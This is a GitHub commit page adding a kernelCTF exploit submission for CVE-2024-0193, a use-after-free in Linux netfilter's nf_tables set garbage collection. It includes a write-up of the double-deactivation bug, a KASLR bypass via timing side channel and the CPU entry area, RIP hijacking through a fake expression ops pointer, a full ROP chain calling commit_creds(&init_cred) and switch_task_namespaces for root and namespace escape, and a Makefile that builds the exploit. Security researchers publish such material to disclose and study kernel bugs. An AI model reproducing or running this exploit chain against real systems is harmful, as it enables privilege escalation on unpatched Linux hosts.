Skip to content

Commit 8275a6a

Browse files
mingiMingi Cho
and
Mingi Cho
authored
Add kernelCTF CVE-2024-0193_mitigation (#121)
Co-authored-by: Mingi Cho <[email protected]>
1 parent 84ae644 commit 8275a6a

File tree

8 files changed

+1370
-0
lines changed

8 files changed

+1370
-0
lines changed
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,214 @@
1+
# Overview
2+
3+
This vulnerability was discovered by Kevin Rich, and his write-up targeting the LTS kernel can be found [here](https://github.com/google/security-research/tree/master/pocs/linux/kernelctf/CVE-2023-0193_lts).
4+
5+
The vulnerability is caused by not validating whether the set is deleted or not when performing GC on set elements. First, deleting the set calls the `nft_delset` function, which decrements the reference count of objects mapped to the set elements in the `nft_map_deactivate` function [1].
6+
7+
```c
8+
static int nft_delset(const struct nft_ctx *ctx, struct nft_set *set)
9+
{
10+
int err;
11+
12+
err = nft_trans_set_add(ctx, NFT_MSG_DELSET, set);
13+
if (err < 0)
14+
return err;
15+
16+
if (set->flags & (NFT_SET_MAP | NFT_SET_OBJECT))
17+
nft_map_deactivate(ctx, set); // [1]
18+
19+
nft_deactivate_next(ctx->net, set);
20+
nft_use_dec(&ctx->table->use);
21+
22+
return err;
23+
}
24+
```
25+
26+
Then, during the GC process, the `nft_trans_gc_catchall_sync` function is called, and the reference count of the object mapped to the element is decremented once more in the `nft_setelem_data_deactivate` function [2].
27+
28+
```c
29+
struct nft_trans_gc *nft_trans_gc_catchall_sync(struct nft_trans_gc *gc)
30+
{
31+
struct nft_set_elem_catchall *catchall, *next;
32+
const struct nft_set *set = gc->set;
33+
struct nft_set_elem elem;
34+
struct nft_set_ext *ext;
35+
36+
WARN_ON_ONCE(!lockdep_commit_lock_is_held(gc->net));
37+
38+
list_for_each_entry_safe(catchall, next, &set->catchall_list, list) {
39+
ext = nft_set_elem_ext(set, catchall->elem);
40+
41+
if (!nft_set_elem_expired(ext))
42+
continue;
43+
44+
gc = nft_trans_gc_queue_sync(gc, GFP_KERNEL);
45+
if (!gc)
46+
return NULL;
47+
48+
memset(&elem, 0, sizeof(elem));
49+
elem.priv = catchall->elem;
50+
51+
nft_setelem_data_deactivate(gc->net, gc->set, &elem); // [2]
52+
nft_setelem_catchall_destroy(catchall);
53+
nft_trans_gc_elem_add(gc, elem.priv);
54+
}
55+
56+
return gc;
57+
}
58+
```
59+
60+
# KASLR Bypass and Information Leak
61+
62+
To bypass KASLR, I used a timing side channel attack to leak the kernel base, and created a fake ops in the non-randomized CPU entry area (CVE-2023-0597) without leaking the heap address.
63+
64+
# RIP Control
65+
66+
```c
67+
struct nft_chain {
68+
struct nft_rule_blob __rcu *blob_gen_0;
69+
struct nft_rule_blob __rcu *blob_gen_1;
70+
struct list_head rules;
71+
struct list_head list;
72+
struct rhlist_head rhlhead;
73+
struct nft_table *table;
74+
u64 handle;
75+
u32 use;
76+
u8 flags:5,
77+
bound:1,
78+
genmask:2;
79+
char *name;
80+
u16 udlen;
81+
u8 *udata;
82+
83+
/* Only used during control plane commit phase: */
84+
struct nft_rule_blob *blob_next;
85+
};
86+
```
87+
88+
When the vulnerability is triggered, the freed `chain->blob_gen_0` can be accessed via `immediate expr`.
89+
90+
```c
91+
unsigned int
92+
nft_do_chain(struct nft_pktinfo *pkt, void *priv)
93+
{
94+
...
95+
do_chain:
96+
if (genbit)
97+
blob = rcu_dereference(chain->blob_gen_1);
98+
else
99+
blob = rcu_dereference(chain->blob_gen_0);
100+
101+
rule = (struct nft_rule_dp *)blob->data;
102+
last_rule = (void *)blob->data + blob->size;
103+
next_rule:
104+
regs.verdict.code = NFT_CONTINUE;
105+
for (; rule < last_rule; rule = nft_rule_next(rule)) {
106+
nft_rule_dp_for_each_expr(expr, last, rule) {
107+
if (expr->ops == &nft_cmp_fast_ops)
108+
nft_cmp_fast_eval(expr, &regs);
109+
else if (expr->ops == &nft_cmp16_fast_ops)
110+
nft_cmp16_fast_eval(expr, &regs);
111+
else if (expr->ops == &nft_bitwise_fast_ops)
112+
nft_bitwise_fast_eval(expr, &regs);
113+
else if (expr->ops != &nft_payload_fast_ops ||
114+
!nft_payload_fast_eval(expr, &regs, pkt))
115+
expr_call_ops_eval(expr, &regs, pkt);
116+
117+
if (regs.verdict.code != NFT_CONTINUE)
118+
break;
119+
}
120+
```
121+
122+
```c
123+
static void expr_call_ops_eval(const struct nft_expr *expr,
124+
struct nft_regs *regs,
125+
struct nft_pktinfo *pkt)
126+
{
127+
#ifdef CONFIG_RETPOLINE
128+
unsigned long e = (unsigned long)expr->ops->eval;
129+
#define X(e, fun) \
130+
do { if ((e) == (unsigned long)(fun)) \
131+
return fun(expr, regs, pkt); } while (0)
132+
133+
X(e, nft_payload_eval);
134+
X(e, nft_cmp_eval);
135+
X(e, nft_counter_eval);
136+
X(e, nft_meta_get_eval);
137+
X(e, nft_lookup_eval);
138+
X(e, nft_range_eval);
139+
X(e, nft_immediate_eval);
140+
X(e, nft_byteorder_eval);
141+
X(e, nft_dynset_eval);
142+
X(e, nft_rt_get_eval);
143+
X(e, nft_bitwise_eval);
144+
#undef X
145+
#endif /* CONFIG_RETPOLINE */
146+
expr->ops->eval(expr, regs, pkt);
147+
}
148+
```
149+
150+
`chain->blob_gen_0` is used in `nft_do_chain`, and `expr->ops->eval` is called to evaluate the expression in `expr_call_ops_eval`. We set the ops of the fake expr to the CPU entry area to control the RIP and allocate the fake blob object larger than 0x2000 to use page allocator.
151+
152+
# Post-RIP
153+
154+
The ROP payload is stored in `chain->blob_gen_0` which is allocated by page allocator.
155+
156+
```c
157+
void rop_chain(uint64_t* data){
158+
int i = 0;
159+
160+
data[i++] = 0x100;
161+
data[i++] = 0x100;
162+
data[i++] = PAYLOAD_LOCATION(1) + offsetof(struct cpu_entry_area_payload, nft_expr_eval);
163+
164+
// current = find_task_by_vpid(getpid())
165+
data[i++] = kbase + POP_RDI_RET;
166+
data[i++] = getpid();
167+
data[i++] = kbase + FIND_TASK_BY_VPID;
168+
169+
// current += offsetof(struct task_struct, rcu_read_lock_nesting)
170+
data[i++] = kbase + POP_RSI_RET;
171+
data[i++] = RCU_READ_LOCK_NESTING_OFF;
172+
data[i++] = kbase + ADD_RAX_RSI_RET;
173+
174+
// current->rcu_read_lock_nesting = 0 (Bypass rcu protected section)
175+
data[i++] = kbase + POP_RCX_RET;
176+
data[i++] = 0;
177+
data[i++] = kbase + MOV_RAX_RCX_RET;
178+
179+
// Bypass "schedule while atomic": set oops_in_progress = 1
180+
data[i++] = kbase + POP_RDI_RET;
181+
data[i++] = 1;
182+
data[i++] = kbase + POP_RSI_RET;
183+
data[i++] = kbase + OOPS_IN_PROGRESS;
184+
data[i++] = kbase + MOV_RSI_RDI_RET;
185+
186+
// commit_creds(&init_cred)
187+
data[i++] = kbase + POP_RDI_RET;
188+
data[i++] = kbase + INIT_CRED;
189+
data[i++] = kbase + COMMIT_CREDS;
190+
191+
// find_task_by_vpid(1)
192+
data[i++] = kbase + POP_RDI_RET;
193+
data[i++] = 1;
194+
data[i++] = kbase + FIND_TASK_BY_VPID;
195+
196+
data[i++] = kbase + POP_RSI_RET;
197+
data[i++] = 0;
198+
199+
// switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy)
200+
data[i++] = kbase + MOV_RDI_RAX_RET;
201+
data[i++] = kbase + POP_RSI_RET;
202+
data[i++] = kbase + INIT_NSPROXY;
203+
data[i++] = kbase + SWITCH_TASK_NAMESPACES;
204+
205+
data[i++] = kbase + SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE;
206+
data[i++] = 0;
207+
data[i++] = 0;
208+
data[i++] = _user_rip;
209+
data[i++] = _user_cs;
210+
data[i++] = _user_rflags;
211+
data[i++] = _user_sp;
212+
data[i++] = _user_ss;
213+
}
214+
```
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,12 @@
1+
- Requirements:
2+
- Capabilities: CAP_NET_ADMIN
3+
- Kernel configuration: CONFIG_NETFILTER, CONFIG_NF_TABLES
4+
- User namespaces required: Yes
5+
- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=5f68718b34a5 (netfilter: nf_tables: GC transaction API to avoid race with control plane)
6+
- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=7315dc1e122c85ffdfc8defffbb8f8b616c2eb1a (netfilter: nf_tables: skip set commit for deleted/destroyed sets)
7+
- Affected Version: v6.5-rc6 - v6.7-rc8
8+
- Affected Component: net/netfilter
9+
- Cause: Use-After-Free
10+
- Syscall to disable: disallow unprivileged username space
11+
- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-0193
12+
- Description: A use-after-free flaw was found in the netfilter subsystem of the Linux kernel. If the catchall element is garbage-collected when the pipapo set is removed, the element can be deactivated twice. This can cause a use-after-free issue on an NFT_CHAIN object or NFT_OBJECT object, allowing a local unprivileged user with CAP_NET_ADMIN capability to escalate their privileges on the system.
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,35 @@
1+
LIBMNL_DIR = $(realpath ./)/libmnl_build
2+
LIBNFTNL_DIR = $(realpath ./)/libnftnl_build
3+
4+
exploit:
5+
gcc -o exploit exploit.c -L$(LIBNFTNL_DIR)/install/lib -L$(LIBMNL_DIR)/install/lib -lnftnl -lmnl -I$(LIBNFTNL_DIR)/libnftnl-1.2.5/include -I$(LIBMNL_DIR)/libmnl-1.0.5/include -static -s
6+
7+
prerequisites: libmnl-build libnftnl-build
8+
9+
libmnl-build : libmnl-download
10+
tar -C $(LIBMNL_DIR) -xvf $(LIBMNL_DIR)/libmnl-1.0.5.tar.bz2
11+
cd $(LIBMNL_DIR)/libmnl-1.0.5 && ./configure --enable-static --prefix=`realpath ../install`
12+
cd $(LIBMNL_DIR)/libmnl-1.0.5 && make
13+
cd $(LIBMNL_DIR)/libmnl-1.0.5 && make install
14+
15+
libnftnl-build : libmnl-build libnftnl-download
16+
tar -C $(LIBNFTNL_DIR) -xvf $(LIBNFTNL_DIR)/libnftnl-1.2.5.tar.xz
17+
cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && PKG_CONFIG_PATH=$(LIBMNL_DIR)/install/lib/pkgconfig ./configure --enable-static --prefix=`realpath ../install`
18+
cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && C_INCLUDE_PATH=$(C_INCLUDE_PATH):$(LIBMNL_DIR)/install/include LD_LIBRARY_PATH=$(LD_LIBRARY_PATH):$(LIBMNL_DIR)/install/lib make
19+
cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && make install
20+
21+
libmnl-download :
22+
mkdir $(LIBMNL_DIR)
23+
wget -P $(LIBMNL_DIR) https://netfilter.org/projects/libmnl/files/libmnl-1.0.5.tar.bz2
24+
25+
libnftnl-download :
26+
mkdir $(LIBNFTNL_DIR)
27+
wget -P $(LIBNFTNL_DIR) https://netfilter.org/projects/libnftnl/files/libnftnl-1.2.5.tar.xz
28+
29+
run:
30+
./exploit
31+
32+
clean:
33+
rm -rf $(LIBMNL_DIR)
34+
rm -rf $(LIBNFTNL_DIR)
35+
rm -f exploit

0 commit comments

Comments
 (0)